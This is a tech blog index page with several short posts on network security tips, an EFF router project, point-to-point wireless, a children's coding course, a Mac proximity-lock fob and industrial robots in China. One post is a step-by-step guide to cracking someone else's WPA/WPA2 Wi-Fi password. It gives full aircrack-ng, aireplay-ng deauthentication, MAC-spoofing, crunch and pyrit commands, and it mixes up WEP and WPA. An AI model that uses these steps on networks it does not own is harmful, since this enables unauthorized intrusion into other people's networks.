Subscribe For Free Updates!

We'll not spam mate! We promise.

Wednesday, April 12, 2017

The Basics of Computer Networking and Security.

The Basics of Computer Networking and Security.

There is no question that starting a business these days is a lot easier than it once was. In the past, you not only required all kinds of equipment to run it, but you also needed manpower. However, these days, a network of computers is often all you need to get things up and running.
Still, you need to ensure that your computer security is top notch, and paying another company to handle your networking problems is not a smart move. Let’s look at some computer security basics to get you started right.

Keep security software updated

There’s more to your antivirus software than just installing and forgetting about it. You must ensure that it is up to date at all times. It doesn’t matter how much security software you have, if you do not make sure to update your virus definitions regularly, it means nothing.
Simply ensure you are running with the most updated virus database, whether it’s a paid version or a free version of antivirus software.

Have a single security suite



The best way to handle your security is to have a single security solution to handle everything so that different programs don’t impede each other. A good security software will offer you all of the needed features – malware, adware, antivirus, etc.

Adjust your firewall settings


This will take only a few minutes of your time and save you a lot of security troubles. All who have computer networking figured out know that firewall itself may cause some conflicts. Because all of the computers in a network are connected together, there might be some permissions problems should your firewall decide to ring a false alarm. To avoid this, just make sure that you have the firewall setting set right.
These three basic principles should provide a good foundation for your networking security. If you can come up with more, share them in the comments and don’t forget to read about Windows Firewall and security and privacy on the internet.

Read More »

Wi-Fi Security

Wi-Fi Security: The Latest Router is Bulletproof

A new project focuses on protecting homes and small businesses from Wi Fi routers with security failings. Over the past year, repeatedly this problem has made headlines as security researchers and law enforcement warn of Wi-Fi security problems that are created by these devices as well as with shared Wi-Fi networks.
The Electronic Frontier Foundation launched the Open Wireless Router project, which has focused on the development of software that offers Wi-Fi security that’s a much higher level than what the current router models are able to offer and it’s a safe way for users to be able to share their networks with guests.
Currently, the firmware isn’t ready to be used by home users. The EFF warns that it is geared to ‘people who are prepared to deal with the bleeding edge.’
Read More »

Monday, August 24, 2015

What is Point to Point?

Point to Point Wireless (PTP) is a method of connecting two locations with ethernet when wires cannot be deployed typically due the substantial cost of ADSL/fibre or where terrain does not allow for cable to be dug into the ground. A PTP bridge could be used to connect two buildings in a school or business park, provide backhaul for a CCTV or ISP network or serve as a lower CAP/OPEX leased line replacement in both rural & urban areas.

Distances, Throughputs and Frequencies of Point to Point

Point to Point wireless operates primarily 5.4, 5.8, 10 – 38, 60, 70 & 80GHz and can reach true throughputs of 50Mbps up to 2Gbps. PTP distances can reach anywhere up to 50km depending on which frequency a PTP radio operates in, how large the antennas are and what vendor is being used. The price of PTP equipment has a strong correlation with the performance especially when in congested environments.
Read More »

Wednesday, August 19, 2015

Online course teaches kids to program while having fun



With technology skills becoming as important as readin’, ritin’ and ’rithmetic in today's digital world, many parents want to ensure that their children develop the right skills for the future. But many don’t know where to begin and how to make learning tech skills fun for their kids.

A new online course, “Server design 1,” is using one of the most popular video games ever – Minecraft, which has more than 100 million registered users and has been a hit among younger players – to teach code to children between 8 and 14. The course teaches kids how to create a Minecraft world that they develop and design themselves using Java code.

This is the latest online course designed by Youth Digital, a technology education organization whose mission is to “create creators” by teaching children how to code, develop apps and design 3D modeling in a fun but challenging manner.

Related: App to school: Top 5 free apps for students

“What’s so great about tech ed is that it really has the ability to shift the way kids see the world and change the way they interact with technology, which is obviously a huge part of their world and will continue to be as they grow up,” says Justin Richards, Youth Digital’s founder and CEO.

He said his approach is to get kids motivated by “learning how to make something that they are actually excited about.” But while young people want to make apps and videogames, the resources often aren’t there, he said.

“If you ask children, ‘Hey, wouldn’t it be awesome to make an app this summer? Or create a videogame? Or a fashion collection? Or a Minecraft mod?’ almost across the board kids would say ‘yes.’”

Related: Top back-to-school gear for the techie student

“Server design 1” allows players to design servers that will let them define the rules of their Minecraft experience from the ground up. It provides students with other motivators, like course badges, coins and funny videos that reward learning, but “ultimately it’s that intrinsic motivation around wanting to create their own video game that motivates them,” Richards said.

Just ask Ronan Boyarski, a 10-year-old student from Virginia who is enrolled in the course.

“I loved learning about how to code in Minecraft,” Ronan said. “It opened up all sorts of new possibilities for me … Youth Digital really showed me what I wanted to do with my life. I really wanted to become a game designer, because once I started coding, I loved it.”

For $250 a year, students can expect to learn coding in Java and basic programming concepts. If students get stuck, they can type in a message to teachers who are ready to assist. The course includes access to a Java server, curriculum, tools and hosting with Youth Digital.

Youth Digital’s other online courses include 3D Animation, App Design and even Fashion Design. It also has summer camp programs in cities across the East Coast.

“We don’t just teach them how to do one thing and how to use the product,” Richards says. “We are really trying as a product to teach them how they can explore and how this is just the start of years potentially of digital creation before they get to college.”
Read More »

Tuesday, March 10, 2015

How to Crack Wi-Fi password using Backtrack in Windows?

 How to Crack Wi-Fi password using Backtrack in Windows?

Actually I was busy for some days so couldn't post on blog but now today I'm back with some Wi-Fi Hacking Tricks. Today, I'm gonna teach you how to hack Wi-Fi and crack Wi-Fi password using backtrack for free? Wi-Fi hacking is now increasing so much that a lot of even try that without knowing the basics of Wi-Fi hacking but now don't be worry, I’ll provide a complete guide on how to hack Wi-Fi password using backtrack easily and fast? So, let’s start and learn this awesome trick on Wi-Fi hacking to Crack WPA/WPA2 Wi-Fi password using Backtrack........



Things Required to Start Cracking Wi-Fi password


1. A Backtrack Live CD?
The Linux Live CD that lets you do all sorts of security testing and tasks. Download yourself a copy of the CD and burn it, or load it up in VMware to get started. I highly recommend you to download backtrack 32 bit version because it runs smoothly.. Download Backtrack from here 

2. A nearby WEP - enabled WiFi network
Before you start WiFi hacking using backtrack,you must have a password protected and WEP enabled WiFi network which is the basic of this hack.
 
3. Patience and knowledge of some basics commands
The most important thing you should have is the patience as sometime the commands may not work correctly and you may not get success. That doesn't mean you should stop trying it but you must try it for more time and quiet frequently. So, keep patience and always be hopeful to get positive result. If you've got some basic knowledge on commands that is very helpful for you but you can even hack using this trick on how to crack Wi-Fi password using backtrack without having any knowledge on commanding. 

 4. VMware Station
VMware Workstation is a desktop visualization solution that provides power users, system administrators and developers with the necessary capabilities to run and test multiple operating systems on the same computer. To put it more simple, VMware Workstation enables you to run multiple virtual machines on your PC, allowing for extensive testing and development of complex networked server-class applications. Through its robust and powerful engine, it makes it easier for developers to introduce virtual infrastructure to a company and increase productivity. Download VMware from here


How to Hack and Crack WiFi Password easily?

 

First you need to install Backtrack on Vmware and use it to get command line.You can simply install Backtrack on Vmware ( just google on how to do it ).After you have install it be ready to know how to crack WiFi passwords easily. Now be sure you typed in proper cmd line which are given below !!!

Type this according to step to start hacking WiFi.

At BOOT Menu....just type startx  


Now your all set to go...just simply follow below steps...now 

Step 1 :
airmon-ng

The result will be something like :
Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0]

Step 2 :
airmon-ng start wlan0

Step 3 (Optional) :

Change the mac address of the mon0 interface.
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up

Step 4 :
airodump-ng mon0

Then, press "Ctrl+c" to break the program.

Step 5 :
airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs mon0

*where -c is the channel
           -w is the file to be written
           --bssid is the BSSID

This terminal is keeping running.

Step 6 :

open another terminal.
aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

*where -a is the BSSID
           -c is the client MAC address (STATION)

Wait for the handshake.

Step 7 :

Use the John the Ripper as word list to crack the WPA/WP2 password.
aircrack-ng -w /pentest/passwords/john/password.lst wpacrack-01.ivs

Step 8 (Optional) :ITS AN OPTIONAL STEP,,,,,,

If you do not want to use John the Ripper as word list, you can use Crunch.

Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download crunch 3.0 (the current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download
tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install
/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | aircrack-ng wpacrack-01.ivs -b ff:ff:ff:ff:ff:ff -w -

*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.


(B) nVidia Display Card with CUDA


If you have nVidia card that with CUDA, you can use pyrit to crack the password with crunch.

Step a :
airmon-ng

The result will be something like :
Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0]


Step b :
airmon-ng start wlan0

Step c (Optional) :

Change the mac address of the mon0 interface.
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up

Step d :
airodump-ng mon0

Then, press "Ctrl+c" to break the program.

Step e :
airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff mon0

Step f :

open another terminal.
aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

*where -a is the BSSID
           -c is the client MAC address (STATION)

Wait for the handshake.

Step g :

If the following programs are not yet installed, please do it.
apt-get install libghc6-zlib-dev libssl-dev python-dev libpcap-dev python-scapy

Step h :

Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download crunch 3.0 (the current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download
tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install

Step i :

Go to the official site of pyrit.
http://code.google.com/p/pyrit/downloads/list

Download pyrit and cpyrit-cuda (the current version is 0.4.0 at the time of this writing).

tar -xzvf pyrit-0.4.0.tar.gz
cd pyrit-0.4.0
python setup.py build
sudo python setup.py install
tar -xzvf cpyrit-cuda-0.4.0.tar.gz
cd cpyrit-cuda-0.4.0
python setup.py build
sudo python setup.py install

Step j :
/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r wpacrack-01.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.

Step k (Optional) :

If you encounter error when reading the wpacrack-01.cap, you should do the following step.
pyrit -r wpacrack-01.cap -o new.cap stripLive
/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r new.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.

Step l :

Then, you will see something similar to the following.
Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Parsing file 'new.cap' (1/1)...
Parsed 71 packets (71 802.11-packets), got 55 AP(s)
Tried 17960898 PMKs so far; 17504 PMKs per second.

Remarks :
If you have an nVidia GeForce GTX460 (336 CUDA cores), the speed of cracking is about 17,000 passwords per second.

To test if your wireless card (either USB or PCI-e) can do the injection or not :
airodump-ng mon0
Open another terminal.
aireplay-ng -9 mon0 Make sure pyrit workable on your system :
pyrit list_cores

That's all






How to Hack and Crack WiFi Password easily ?
How to Hack and Crack WiFi Password easily ?
How to Hack and Crack WiFi Password easily ?
Read More »

Monday, February 9, 2015

A Wireless Sensor That Locks Your Mac When You Walk Away


Security is boring—particularly when it works properly.

The new Sesame 2 key fob is a dead-simple security solution for your Mac that’s exactly the right kind of boring. It automatically locks your computer when you walk away from it. Also, not as boring, it allows for some customizable actions including two-factor authentication.

READ: 12 Most Ancient and Magnificent Trees From Around the World

The small device fastens to your key chain or slips into your change pocket and pairs to your Mac over Bluetooth. It can determine your physical distance from your machine, and when you wander too far away from your Mac, it can force the screen to lock, requiring a login to access the desktop again.

When you return, it can either unlock your computer automatically or, if you have the optional Two-Factor Authentication mode enabled, require both the system password and the Sesame 2 to unlock the computer.

Atama originally put out its first Sesame Bluetooth key last year. This new version, the Sesame 2, is now available on the London-based company’s website for $39, or at Apple Stores and Amazon in the U.K. for £39.

The distance that triggers a screen lock is somewhat customizable—users can choose between “Near” and “Far” locking distances. While there’s some fluctuation in actual distance because of varying real-world conditions, the “Near” option typically locks your Mac once you step 20-25 feet away from it.

READ: Inside the Dangerous World of Amateur ‘Ninja’ Gold Miners

In addition to locking and unlocking your screen, the Sesame 2 also lets you automate custom actions with Apple Script. For example, you can set Spotify to pause when you walk away and resume when you return, or adjust your messaging status on to “Away” automatically when you stroll to the kitchen.

While you can certainly use a smartphone app to accomplish close to the same net result—locking and unlocking your computer according to your proximity—the app method does require further dependence on your phone. If you take your phone with you everywhere you go, you probably don’t need something like the Sesame 2. But, if you want the freedom to leave your phone behind or stashed in your bag while you interface offline, then the small, low-impact Sesame may give you one less thing to worry about when you step away from your computer.

So, what happens if you lose your keys with the Sesame 2 attached? The fob’s fail-safe is the same as if you’d forgotten your Mac OS X system password: just reboot your computer in target disk mode and reset your login requirements.

READ: 21 Awesomely Well-Designed Products We’re Dying to Own

Atama’s Sesame 2 is currently compatible with most Macs from 2012 or later running either OS X 10.9.5 or OS X 10.10. Though there isn’t currently an option available for Windows PCs, Atama is conducting beta-testing for an eventual Windows-supported release.
Read More »

Sunday, February 8, 2015

China Will Have the Most Robots in the World by 2017


China Will Have the Most Robots in the World by 2017

China will have more robots operating in its production plants by 2017 than any other country as it cranks up automation of its car and electronics factories, the International Federation of Robotics (IFR) said on Thursday.
Already the biggest market in the $9.5 billion (6 billion pound) global robot trade — or $29 billion including associated software, peripherals and systems engineering — China lags far behind its more industrialized peers in terms of robot density.
China has just 30 robots per 10,000 workers employed in manufacturing industries, compared with 437 in South Korea, 323 in Japan, 282 in Germany and 152 in the United States.
But a race by carmakers to build plants in China along with wage inflation that has eroded the competitiveness of Chinese labor will push the operational stock of industrial robots to more than double to 428,000 by 2017, the IFR estimates.
"Companies are forced to invest ever more in robots to be more productive and raise quality," said Gudrun Litzenberger, general secretary of the Frankfurt-based IFR.
"In the current phase it’s the auto industry, but in the next two or three years it will be driven by the electronics industry," she said.
Japanese robot makers still have the lion’s share of the market, with about 60 percent, but Chinese suppliers are growing fast, with about a quarter of the market. Most of the rest are supplied by European and U.S. manufacturers.
Four foreign robot makers — Switzerland’s ABB, Germany’s Kuka, and Japan’s Yaskawa and Fanuc — already have production sites in China and more are expected to follow.
"The automation of China’s production plants has just started," said Per Vegard Nerseth, Managing Director of ABB Robotics. "We have witnessed swift, almost explosive growth over the last two or three years, surpassing even our expectations."
The automotive industry is by far the largest customer for robots in China, accounting for about 40 percent of robots in operation, as China is both the world’s biggest car market and its biggest production site.
European carmakers such as Volkswagen (VOWG_p.DE) and Daimler which have invested heavily in China are bringing their robotics suppliers with them, Litzenberger said.
The electronics industry is expected to follow.
Taiwanese contract manufacturing giant Foxconn, which makes Apple iPhones and iPads among other products, is already making its own Foxbot robots as well as using robots bought from other suppliers.
(Editing by Mark Potter)
Read More »